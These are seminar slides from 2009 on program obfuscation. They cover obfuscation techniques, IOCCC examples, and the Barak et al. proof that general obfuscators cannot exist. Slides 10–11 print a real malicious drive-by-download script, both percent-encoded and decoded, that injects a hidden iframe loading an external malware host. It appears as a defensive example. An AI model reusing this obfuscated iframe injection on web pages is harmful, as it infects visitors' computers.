
Seminar in Cryptographic Protocols: Program Obfuscation

Omer Singer, June 8, 2009



  1. Seminar in Cryptographic Protocols: Program Obfuscation Omer Singer June 8, 2009

  2. Practical Background

  3. What is program obfuscation? • Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do. • “The art of making things appear more complicated”

  4. What does this function do? Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html

  5. Three main measures of an obfuscating transformation: • Potency • Resilience • Cost. Many methods in use: • Modify variable names and layout • Replace integer values with complex equations • Change program flow • Modify data structures • Anti-disassembly (“armored” viruses) • Anti-debugging
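A few of the methods listed above can be illustrated on a toy function. The sketch below is hypothetical: the function names and the particular transformations are assumptions chosen for illustration, not taken from the slides. It renames identifiers, hides an integer constant behind an equivalent expression, and changes the control flow, while keeping the behavior the same.

```python
def average(values):
    """Readable original: arithmetic mean of a non-empty list."""
    total = 0
    for v in values:
        total += v
    return total / len(values)


def O0(l1):
    """Same behavior after three hand-applied transformations."""
    # Constant hiding: (7 * 7 - 1) % 12 == 48 % 12 == 0
    lI = (7 * 7 - 1) % 12
    # Control-flow change: a while loop driven by a state flag
    # replaces the simple for loop of the original.
    I1, state = 0, 1
    while state:
        if I1 < len(l1):
            lI += l1[I1]
            I1 += 1
        else:
            state = 0
    return lI / len(l1)


print(average([1, 2, 3, 4]), O0([1, 2, 3, 4]))  # 2.5 2.5
```

Hand-made transformations like these score low on resilience: a reader or an automated tool can undo them quickly, which is why potency, resilience, and cost are weighed together.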

  6. And now for some seriously obfuscated programs…

  7. Winner of the International Obfuscated C Code Contest (IOCCC) in 1996: shows the time on a clock with a configurable face and style.

  8. Winner of the international C obfuscation contest in 2001 #include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(structsockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_setI;structsocka\ ddr_inil;struct host\ ent*LI; structtimevalIL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). 
sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);} Network-based Pong game

  9. No more fun and games…

  10. Actual web code blocked by an Intrusion Prevention System at a client: <Script Language='Javascript'> <!-- document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E%3C%2F%54%49%54%4C%45%3E%0A%3C%2F%48%45%41%44%3E%0A%3C%42%4F%44%59%20%6C%65%66%74%6D%61%72%67%69%6E%3D%30%20%74%6F%70%6D%61%72%67%69%6E%3D%30%20%72%69%67%68%74%6D%61%72%67%69%6E%3D%30%20%62%6F%74%74%6F%6D%6D%61%72%67%69%6E%3D%30%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%30%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%30%3E%0A%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%66%73%6F%69%70%61%61%77%61%2E%63%6F%6D%2F%65%77%69%6F%71%61%2F%22%3E%3C%49%4D%47%20%73%72%63%3D%22%62%61%6E%6E%65%72%32%2E%67%69%66%22%20%77%69%64%74%68%3D%22%33%30%32%22%20%68%65%69%67%68%74%3D%22%32%35%32%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%61%3E%0A%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%78%63%7A%78%6F%2E%69%6E%66%6F%2F%6D%70%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%6E%6F%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%0A%0A%3C%2F%42%4F%44%59%3E%0A%3C%2F%48%54%4D%4C%3E')); //--> </Script>

  11. When deobfuscated… <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0> <a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a> <iframe src="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe> </BODY> </HTML>
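The decoding step between the two slides above is plain percent-decoding, so it can be reproduced without running the script in a browser. The sketch below uses Python's standard `urllib.parse.unquote` as a stand-in for JavaScript's `unescape`; the two agree for the ASCII `%XX` sequences used here, but this is not a general replacement (for example, `unescape` also accepts `%uXXXX` forms). Only two short fragments of the encoded string are decoded.

```python
from urllib.parse import unquote

# First six encoded bytes of the string passed to unescape() on the slide.
opening_tag = "%3C%48%54%4D%4C%3E"
print(unquote(opening_tag))  # <HTML>

# The fragment that introduces the hidden 1x1 frame.
frame_start = "%3C%69%66%72%61%6D%65%20%73%72%63%3D"
print(unquote(frame_start))  # <iframe src=
```

Decoding offline like this lets an analyst inspect the payload without ever letting `document.write` execute it.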

  12. Source: http://www.finjan.com/Content.aspx?id=1456

  13. Source: http://www.finjan.com/Content.aspx?id=1456

  14. Obfuscation helps malware bypass antivirus software and delays the response of security researchers • Obfuscated web code is often the first step in a “drive-by download” attack • When the web code is executed by the browser it calls programs to target local software • Result is infection of the user’s computer

  15. Source: http://viruslist.com/en/analysis?pubid=204792056

  16. Google Search Results Containing a Harmful URL Source: http://viruslist.com/en/analysis?pubid=204792056

  17. Attempt to calculate impact of obfuscated online attacks: • $13.2 billion direct damages of malware [1] • 74% of malware spread via compromised websites [2] • 80% of browser-based attacks are now obfuscated [3] • $13.2 billion × 0.74 × 0.80 ≈ $7.8 billion. Sources: [1] http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf [2] http://viruslist.com/en/analysis?pubid=204792056 [3] http://www.securityfocus.com/brief/846
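The estimate on this slide is a straight product of the three figures. The short check below reproduces it; the variable names are illustrative, and multiplying the percentages assumes they apply independently to the damage total, which the slide itself presents only as an attempt.

```python
direct_damages_billion = 13.2  # direct damages of malware, in billions of USD
share_via_websites = 0.74      # share of malware spread via compromised websites
share_obfuscated = 0.80        # share of browser-based attacks that are obfuscated

estimate = direct_damages_billion * share_via_websites * share_obfuscated
print(f"${estimate:.1f} billion")  # $7.8 billion
```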

  18. Knowing is half the battle… A few tips to stop obfuscated “drive-by download” attacks • Use NoScript to block active content on Firefox • Don’t click on web ads • Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.

  19. Program obfuscation has some positive uses as well!

  20. Preventing source code theft • Disrupt reverse engineering • Block code copying • Especially important with the increased use of Java and .NET languages such as C# and Visual Basic, which compile to intermediate bytecode rather than native machine code • Microsoft recommends obfuscating ASP files in case of server compromise • Watermarking and Digital Rights Management (DRM)
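Why bytecode-compiled languages are easier to reverse engineer can be seen with a small experiment. The sketch below uses Python's own bytecode as an analogy for Java and .NET; that analogy, and the hypothetical `check_license` function, are assumptions made for illustration. The compiled code object still carries the original local variable names, which is exactly the information an identifier-renaming obfuscator removes.

```python
import dis


def check_license(key):
    # Hypothetical routine a vendor might want to protect.
    secret_offset = 42
    return (key + secret_offset) % 97 == 0


code = check_license.__code__
print(code.co_varnames)  # ('key', 'secret_offset')

# Human-readable listing of the compiled instructions.
dis.dis(check_license)
```

The listing printed by `dis.dis` varies between Python versions, so no output is shown for it here.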

  21. “If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.” - Chris Wysopal, “Good Obfuscation, Bad Code”

  22. Definitions

  23. Oracle Access • Used by [B+] to model the adversary • The oracle is some function f • Adversary makes query q to the oracle, receives answer f(q) • Useful when studying obfuscation: the oracle serves as an interface to the program without exposing its contents

  24. Adversary with Oracle Access [Figure: the Adversary sends query q to the Oracle, which passes q to the Program; the answer f(q) returns along the same path.]
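Oracle access can be pictured as an interface that accepts a query and returns an answer, and nothing more. The following is a minimal sketch under that reading; `make_oracle`, `hidden_program`, and `adversary` are hypothetical names, and the arithmetic inside `hidden_program` is an arbitrary stand-in for f.

```python
from typing import Callable, Dict, Iterable


def make_oracle(program: Callable[[int], int]) -> Callable[[int], int]:
    """Wrap a program so callers can only submit queries and read answers."""
    def oracle(q: int) -> int:
        return program(q)
    return oracle


def hidden_program(x: int) -> int:
    # Stand-in for f; the adversary is not supposed to read this body.
    return (x * x + 1) % 17


def adversary(oracle: Callable[[int], int], queries: Iterable[int]) -> Dict[int, int]:
    """Learns only the (q, f(q)) pairs it asks for."""
    return {q: oracle(q) for q in queries}


transcript = adversary(make_oracle(hidden_program), [0, 1, 2])
print(transcript)  # {0: 1, 1: 2, 2: 5}
```

This models the interface only. A Python closure can still be introspected, so the wrapper is not itself a security boundary.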

  25. Virtual Black Box Anything one can efficiently compute from a virtual black box, one should be able to efficiently compute given just oracle access to the program. In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.

  26. Example program: • Speaks Spanish • Answers in the form of a question. Query q: “Tell me about yourself”. Answer f(q): “¿Qué quieres saber?” (“What do you want to know?”)

  27. [Figure: on one side, an adversary with access to the virtual black box; on the other, a simulator with oracle access to the function.]

  28. Circuit In the [B+] paper on obfuscation, a circuit plays the role of a Turing machine restricted to inputs of a fixed, finite length.

  29. Circuits are easier to put in a virtual black box. • Therefore obfuscating circuits is easier than obfuscating TMs. • The [B+] paper first proves its theorems for TMs, then extends them easily to circuits.

  30. Obfuscators • An obfuscator is an algorithm O that will restrict what an adversary can learn about P given O(P).

  31. What is the adversary trying to achieve? • Construct a program that produces the same output as P • Construct a program that produces output with some relation to the output of P • Compute some function of P • Decide some property of P • The last goal is the weakest, so we want to prove that even preventing it is impossible.

  32. General Impossibility Proof

  33. TM Obfuscator A probabilistic algorithm O is a TM obfuscator if the following conditions hold…

  34. Functionality: For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.

  35. Polynomial slowdown: The description length and running time of O(M) are at most polynomially larger than those of M

  36. “Virtual black box” property: For any PPT A, there is a PPT S and a negligible function α such that for all TMs M: $\left|\Pr[A(O(M)) = 1] - \Pr[S^{M}(1^{|M|}) = 1]\right| \le \alpha(|M|)$

  37. Circuit Obfuscator • Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length • Hence the proposition: If a TM obfuscator exists, then a circuit obfuscator exists • Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows

  38. Unobfuscatable Circuit Ensemble • A family of circuits such that: • Every circuit c in the family is efficient • There exists a predicate π(c) such that • π(c) is hard to compute with oracle access to the function that c computes • π(c) is easy to compute with access to any circuit c’ that computes the same function as c

  39. Main Proof Structure [B+] structure their proof of the main impossibility result as follows: • Define obfuscators that are secure when applied to two programs • Show that such obfuscators do not exist • Modify the construction to prove that TM/circuit obfuscators do not exist • Show how this proof yields an unobfuscatable function ensemble

  40. 2-TM Obfuscator A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.

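  41. Formal definition of the strengthened “virtual black box” property: for any PPT A, there is a PPT S and a negligible function α such that for all TMs M, N: $\left|\Pr[A(O(M), O(N)) = 1] - \Pr[S^{M,N}(1^{|M|+|N|}) = 1]\right| \le \alpha(\min\{|M|,|N|\})$. The first term describes the adversary with access to two obfuscated TMs; the second describes the simulator with oracle access to the two TMs.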

  42. Proposition: 2-TM obfuscators do not exist. According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.

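  43. Proof by contradiction… • Suppose that there exists a 2-TM obfuscator O. • Consider a function that cannot be learned by oracle queries, for example the following Turing machine, defined for $\alpha, \beta \in \{0,1\}^k$: $C_{\alpha,\beta}(x) = \beta$ if $x = \alpha$, and $0^k$ otherwise.

  44. Define another Turing machine $D_{\alpha,\beta}$ such that: $D_{\alpha,\beta}(C) = 1$ if $C(\alpha) = \beta$, and $0$ otherwise. • Consider an adversary A such that: • A(C,D) = D(C)

  45. Then for any α,β: $\Pr[A(O(C_{\alpha,\beta}), O(D_{\alpha,\beta})) = 1] = 1$. By contrast, if $Z_k$ is the Turing machine that always outputs $0^k$, then for uniformly random α,β: $\Pr[A(O(Z_k), O(D_{\alpha,\beta})) = 1] = 2^{-k}$.

  46. Therefore S with oracle access to $C_{\alpha,\beta}$ and $D_{\alpha,\beta}$ must output 1, and with oracle access to $Z_k$ and $D_{\alpha,\beta}$ must output 0… but S cannot differentiate between the two (it would have to query α, which it finds with only exponentially small probability), so we have a contradiction.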

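  47. Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that: $\left|\Pr[A(O(M), O(N)) = 1] - \Pr[S^{M,N}(1^{|M|+|N|}) = 1]\right| \le \alpha(\min\{|M|,|N|\})$. The combination of these equations contradicts the assumption that O is a 2-TM obfuscator.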
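The gap this proof exploits, between holding a program and merely querying it, can be sketched in a few lines. The code below follows the [B+] construction of a point-function machine C, a tester machine D, and an all-zeros machine Z, with Python callables standing in for Turing machine descriptions and integers standing in for k-bit strings. Those stand-ins, the helper names, and the step that forces β to be nonzero are assumptions made to keep the demonstration deterministic; in the proof β is uniform and the second probability is 2^-k rather than exactly 0.

```python
import secrets

K = 16  # security parameter k; alpha and beta are k-bit values


def make_C(alpha, beta):
    """C(x) returns beta if x == alpha, and 0 otherwise."""
    return lambda x: beta if x == alpha else 0


def make_D(alpha, beta):
    """D(C) returns 1 if C(alpha) == beta, and 0 otherwise."""
    return lambda C: 1 if C(alpha) == beta else 0


def Z(x):
    """Z always outputs 0."""
    return 0


def A(C, D):
    """The adversary holds both programs, so it can feed one to the other."""
    return D(C)


alpha = secrets.randbits(K)
beta = secrets.randbits(K) | 1  # assumption: force beta != 0 so Z never passes
C, D = make_C(alpha, beta), make_D(alpha, beta)

print(A(C, D))  # 1
print(A(Z, D))  # 0


def oracle_only_guess(C_oracle, tries=100):
    """A simulator limited to point queries sees a nonzero answer only if it
    happens to query alpha, which has probability about tries / 2**K."""
    return any(C_oracle(secrets.randbits(K)) != 0 for _ in range(tries))
```

With only oracle access the simulator has no description of C to hand to D, and random queries to C almost never land on α, so it cannot tell C apart from Z.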

  48. In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.
